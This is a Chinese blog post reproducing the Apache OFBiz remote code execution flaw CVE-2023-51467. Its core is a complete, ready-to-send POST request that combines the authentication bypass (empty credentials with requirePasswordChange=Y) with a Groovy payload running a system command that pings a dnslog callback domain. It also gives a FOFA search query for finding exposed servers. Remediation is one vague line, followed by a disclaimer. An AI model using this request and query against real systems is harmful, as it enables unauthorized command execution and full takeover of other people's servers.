【复现】Apache OFBiz RCE漏洞(CVE-2023-51467)_03

文章讨论了ApacheOFBiz中的一个远程代码执行漏洞,攻击者可通过恶意参数执行系统命令。复现方法和漏洞类型(RCE)详细描述,提出对命令执行函数的过滤建议,并提醒读者注意搜索语法。同时,文章包含了免责声明,强调使用者自行承担风险和责任。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一

四.修复建议

五. 搜索语法

六.免责声明


一.概述

Apache OFBiz不仅是一个 产品 及 订单管理 系统,它还提供了一整套功能,涵盖企业所需的方方面面。 除了管理产品及其相关内容 (如电子商店)外,Apache OFBiz还能履行许多其它重要角色,包括 客户关系管理 、项目进度、计费管理、 人力资源管理 以及订单管理。

二 .漏洞影响

        通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。继承Web服务器程序的权限,去执行系统命令,控制整个服务器。

三.漏洞复现

1. 漏洞一

(1)漏洞类型:  RCE

(2)请求类型:POST

(3)复现

系统图标


响应


请求包

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 
Cookie: JSESSIONID=81BEE92BF8959631565563D834A6407D.jvm1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 175

groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22ping+f8mep8.dnslog.cn%22.execute%28%29%27%29

四.修复建议

命令执行函数的变量在进入执行命令函数前要做好过滤和检测。

五. 搜索语法

1.fofa

icon_hash="196478136"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值